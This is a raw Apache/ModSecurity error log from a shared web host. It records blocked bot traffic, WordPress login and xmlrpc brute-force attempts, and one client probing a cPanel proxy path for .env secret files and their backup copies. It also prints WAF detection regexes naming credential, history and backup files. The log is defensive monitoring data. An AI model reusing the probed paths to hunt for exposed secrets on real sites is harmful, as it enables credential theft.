[Tue May 26 18:53:10.638331 2026] [security2:error] [pid 1036960:tid 1037183] [client 178.20.47.39:63926] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "koneksi.com.co"] [uri "/wp-comments-post.php"] [unique_id "ahWevoGNKXNii6nttH9XjQAAAOI"], referer: https://koneksi.com.co/como-borrar-o-eliminar-una-cuenta-de-instagram-para-siempre/
[Tue May 26 18:53:10.821180 2026] [security2:error] [pid 1036960:tid 1037212] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWevoGNKXNii6nttH9XgwAAAP8"]
[Tue May 26 18:53:11.338211 2026] [security2:error] [pid 1036960:tid 1037106] [client 114.119.147.205:30395] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jobs.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahWev4GNKXNii6nttH9XnwAAAJU"]
[Tue May 26 18:53:11.952579 2026] [security2:error] [pid 1036960:tid 1037084] [remote 5.42.158.148:46162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWev4GNKXNii6nttH9XrQAAzns"]
[Tue May 26 18:53:13.132371 2026] [security2:error] [pid 1036960:tid 1037119] [client 104.28.122.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWewIGNKXNii6nttH9X2QAAAKI"]
[Tue May 26 18:53:13.185843 2026] [security2:error] [pid 1036960:tid 1037162] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWewIGNKXNii6nttH9XzwAAAM0"]
[Tue May 26 18:53:13.501178 2026] [security2:error] [pid 1036960:tid 1037200] [client 107.170.66.128:55559] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWewYGNKXNii6nttH9X6gAAAPM"]
[Tue May 26 18:53:14.414216 2026] [security2:error] [pid 1036960:tid 1037011] [remote 5.42.158.148:46162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWewoGNKXNii6nttH9YAAAAtDI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:53:14.660404 2026] [security2:error] [pid 1036960:tid 1037091] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWewoGNKXNii6nttH9X_gAAAIY"]
[Tue May 26 18:53:15.098188 2026] [security2:error] [pid 1036960:tid 1037125] [client 93.174.93.12:60000] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "md-74.webhostbox.net"] [uri "/"] [unique_id "ahWew4GNKXNii6nttH9YEgAAAKg"]
[Tue May 26 18:53:15.423206 2026] [security2:error] [pid 1036960:tid 1037175] [client 74.7.175.143:41428] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWewoGNKXNii6nttH9YDAAA2nw"]
[Tue May 26 18:53:15.423234 2026] [security2:error] [pid 1036960:tid 1037175] [client 74.7.175.143:41428] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWewoGNKXNii6nttH9YDAAA2nw"]
[Tue May 26 18:53:15.997539 2026] [security2:error] [pid 1036960:tid 1037163] [client 74.7.175.192:41202] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rsmsi.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWew4GNKXNii6nttH9YLQAAzgw"]
[Tue May 26 18:53:16.087854 2026] [security2:error] [pid 1036960:tid 1037214] [client 74.7.241.177:36366] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rsmsi.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWexIGNKXNii6nttH9YMQABAX4"]
[Tue May 26 18:53:16.318423 2026] [security2:error] [pid 1036960:tid 1037099] [client 66.249.64.45:46322] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWew4GNKXNii6nttH9YHwAAAI4"], referer: https://mosykay.com/prizes/298460430
[Tue May 26 18:53:16.359721 2026] [security2:error] [pid 1036960:tid 1036982] [remote 167.172.25.98:38384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWexIGNKXNii6nttH9YMwABBBU"]
[Tue May 26 18:53:16.903606 2026] [security2:error] [pid 1036960:tid 1037166] [client 74.7.241.149:60914] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rstc.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWexIGNKXNii6nttH9YQgAA0Rg"]
[Tue May 26 18:53:17.275375 2026] [security2:error] [pid 1036960:tid 1037147] [client 74.7.230.2:52098] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rsvp.strapptech.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWexYGNKXNii6nttH9YSgAAvhE"]
[Tue May 26 18:53:17.908508 2026] [security2:error] [pid 1036960:tid 1037193] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWexYGNKXNii6nttH9YVAAAAOw"]
[Tue May 26 18:53:18.397506 2026] [proxy:error] [pid 1036960:tid 1037128] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:53:18.397604 2026] [proxy_http:error] [pid 1036960:tid 1037128] [client 198.235.24.35:57996] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:53:18.398528 2026] [proxy:error] [pid 1036960:tid 1037128] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:53:18.398592 2026] [proxy_http:error] [pid 1036960:tid 1037128] [client 198.235.24.35:57996] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:53:18.481207 2026] [security2:error] [pid 1036960:tid 1036988] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWexoGNKXNii6nttH9YZQAAzBs"]
[Tue May 26 18:53:18.481408 2026] [security2:error] [pid 1036960:tid 1037161] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWexoGNKXNii6nttH9YZQAAzBs"]
[Tue May 26 18:53:18.611993 2026] [security2:error] [pid 1036960:tid 1037109] [client 185.191.171.13:57212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahWexoGNKXNii6nttH9YZwAAAJg"]
[Tue May 26 18:53:18.612202 2026] [security2:error] [pid 1036960:tid 1037109] [client 185.191.171.13:57212] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahWexoGNKXNii6nttH9YZwAAAJg"]
[Tue May 26 18:53:19.236949 2026] [security2:error] [pid 1036960:tid 1036992] [remote 167.172.25.98:38384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWex4GNKXNii6nttH9YeAAA0R8"], referer: https://tea.canopykaapi.com/wp-login.php
[Tue May 26 18:53:19.557191 2026] [security2:error] [pid 1036960:tid 1037164] [client 91.84.124.42:55550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.124.84.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahWex4GNKXNii6nttH9YdwAAAM8"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 18:53:19.557333 2026] [security2:error] [pid 1036960:tid 1037164] [client 91.84.124.42:55550] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahWex4GNKXNii6nttH9YdwAAAM8"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 18:53:19.917285 2026] [security2:error] [pid 1036960:tid 1037107] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWex4GNKXNii6nttH9YhgAAAJY"]
[Tue May 26 18:53:21.578973 2026] [security2:error] [pid 1036960:tid 1037188] [client 114.119.153.208:41787] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.lifestylemne.me"] [uri "/portfolio/service-3/"] [unique_id "ahWeyYGNKXNii6nttH9YwQAAAOc"], referer: https://www.lifestylemne.me/
[Tue May 26 18:53:22.123941 2026] [security2:error] [pid 1036960:tid 1037126] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeyYGNKXNii6nttH9YxAAAAKk"]
[Tue May 26 18:53:24.356877 2026] [security2:error] [pid 1036960:tid 1037159] [client 123.24.129.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWey4GNKXNii6nttH9ZBAAAAMo"]
[Tue May 26 18:53:24.791798 2026] [security2:error] [pid 1036960:tid 1037144] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWezIGNKXNii6nttH9ZEwAAALs"]
[Tue May 26 18:53:25.593867 2026] [security2:error] [pid 1036960:tid 1037097] [client 141.164.86.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWezYGNKXNii6nttH9ZLAAAAIw"], referer: https://www.anujtradingco.com/
[Tue May 26 18:53:26.093501 2026] [core:error] [pid 1036960:tid 1037100] [client 142.248.80.45:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:53:26.093529 2026] [core:error] [pid 1036960:tid 1037100] [client 142.248.80.45:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:53:26.813718 2026] [security2:error] [pid 1036960:tid 1037173] [client 141.164.86.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWezoGNKXNii6nttH9ZXgAAANg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443274&moderation-hash=a2e0dc874b9c562e09cc11574bf5cf88
[Tue May 26 18:53:26.951312 2026] [security2:error] [pid 1036960:tid 1037153] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWezoGNKXNii6nttH9ZVQAAAMQ"]
[Tue May 26 18:53:27.081616 2026] [security2:error] [pid 1036960:tid 1037216] [client 142.248.80.45:42238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahWez4GNKXNii6nttH9ZcgAAAQM"]
[Tue May 26 18:53:27.571390 2026] [security2:error] [pid 1036960:tid 1037099] [client 142.248.80.45:10564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahWez4GNKXNii6nttH9ZnAAAAI4"]
[Tue May 26 18:53:27.571468 2026] [security2:error] [pid 1036960:tid 1037206] [client 142.248.80.45:10550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahWez4GNKXNii6nttH9ZnQAAAPk"]
[Tue May 26 18:53:27.572599 2026] [security2:error] [pid 1036960:tid 1037115] [client 142.248.80.45:10568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahWez4GNKXNii6nttH9ZmwAAAJ4"]
[Tue May 26 18:53:27.666291 2026] [security2:error] [pid 1036960:tid 1037104] [client 66.249.64.162:61699] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWezoGNKXNii6nttH9ZVwAAAJM"], referer: http://doyecpa.com/prizes/268104864
[Tue May 26 18:53:29.232039 2026] [security2:error] [pid 1036960:tid 1037201] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe0IGNKXNii6nttH9Z5AAAAPQ"]
[Tue May 26 18:53:29.554582 2026] [security2:error] [pid 1036960:tid 1036975] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe0YGNKXNii6nttH9Z9AAA1A4"]
[Tue May 26 18:53:29.554937 2026] [security2:error] [pid 1036960:tid 1037169] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe0YGNKXNii6nttH9Z9AAA1A4"]
[Tue May 26 18:53:31.534795 2026] [security2:error] [pid 1036960:tid 1037159] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe04GNKXNii6nttH9aNQAAAMo"]
[Tue May 26 18:53:32.320294 2026] [core:error] [pid 1036960:tid 1037152] [client 198.235.24.119:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:53:32.320315 2026] [core:error] [pid 1036960:tid 1037152] [client 198.235.24.119:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:53:32.379906 2026] [security2:error] [pid 1036960:tid 1037208] [client 142.248.80.45:10688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahWe1IGNKXNii6nttH9aUQAAAPs"]
[Tue May 26 18:53:32.961427 2026] [security2:error] [pid 1036960:tid 1037149] [client 142.248.80.45:10980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahWe1IGNKXNii6nttH9aagAAAMA"]
[Tue May 26 18:53:32.961434 2026] [security2:error] [pid 1036960:tid 1037104] [client 142.248.80.45:10968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahWe1IGNKXNii6nttH9acQAAAJM"]
[Tue May 26 18:53:32.961495 2026] [security2:error] [pid 1036960:tid 1037144] [client 142.248.80.45:10828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahWe1IGNKXNii6nttH9abwAAALs"]
[Tue May 26 18:53:32.961881 2026] [security2:error] [pid 1036960:tid 1037216] [client 142.248.80.45:10966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahWe1IGNKXNii6nttH9abAAAAQM"]
[Tue May 26 18:53:32.961957 2026] [security2:error] [pid 1036960:tid 1037120] [client 142.248.80.45:10918] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahWe1IGNKXNii6nttH9acAAAAKM"]
[Tue May 26 18:53:32.962076 2026] [security2:error] [pid 1036960:tid 1037139] [client 142.248.80.45:10936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahWe1IGNKXNii6nttH9abQAAALY"]
[Tue May 26 18:53:32.962653 2026] [security2:error] [pid 1036960:tid 1037111] [client 142.248.80.45:10792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahWe1IGNKXNii6nttH9acgAAAJo"]
[Tue May 26 18:53:32.962966 2026] [security2:error] [pid 1036960:tid 1037114] [client 142.248.80.45:10896] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.veganfoodindia.com"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahWe1IGNKXNii6nttH9adQAAAJ0"]
